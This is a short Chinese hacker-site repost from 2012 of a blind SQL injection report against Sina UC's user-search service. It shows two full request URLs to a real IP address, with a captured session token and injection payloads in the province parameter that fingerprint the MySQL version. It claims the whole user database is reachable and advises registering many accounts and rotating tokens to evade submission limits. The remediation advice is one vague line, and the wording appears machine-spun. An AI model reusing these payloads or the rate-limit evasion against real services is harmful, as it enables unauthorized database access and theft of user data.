安全黑客
当前位置:安全黑客文章资讯安全技术脚本攻防
日期:2012-05-19 11:12:00  来源:本站整理

新浪UC下的一个悲催的注入[脚本攻防]

赞助商链接



  本文“新浪UC下的一个悲催的注入[脚本攻防]”是由安全黑客为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

安全黑客PS下哈,这里请大家盲注,需求登录,并且不能频繁提交,没深化测试,太蛋痛
漏洞证明:真做简单测试,太蛋痛了,不过这可以整个UC的库;
登录UC后,抓到uid和tgt然后提交
http://58.63.237.91/ucsearch/findByanother?requid=27492*****&tgt=2edb25407a87d57d5216f80265fbb987&gender=f&age=0&isonline=1&hascamera=0&Validate=0&province=%E5%B9%BF%E4%B8%9C'%20and%20substring(@@version,1,1)=5%20and%20'1'='1
 
 
http://58.63.237.91/ucsearch/findByanother?requid=27492*****&tgt=2edb25407a87d57d5216f80265fbb987&gender=f&age=0&isonline=1&hascamera=0&Validate=0&province=%E5%B9%BF%E4%B8%9C'%20and%20substring(@@version,1,1)=4%20and%20'1'='1
 
 

 
 
据此判断出是mysql5的数据库
 
假如想要冲破提交限制,可以注册大量的UC账号,一个账号的tgt提交三次恳求,轮番提交
 
www.110hack.com供应修复筹划:加强过滤


  以上是“新浪UC下的一个悲催的注入[脚本攻防]”的内容,如果你对以上该文章内容感兴趣,你可以看看安全黑客为您推荐以下文章:
  • 新浪UC下的一个悲催的注入
  • 本文地址: 与您的QQ/BBS好友分享!

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    免责条款 - 广告合作 - 下载声明 - 欢迎投稿 - 友情连接 - 网站地图 -
    Copyright © 2012-2013 www.110hack.com. All Rights Reserved .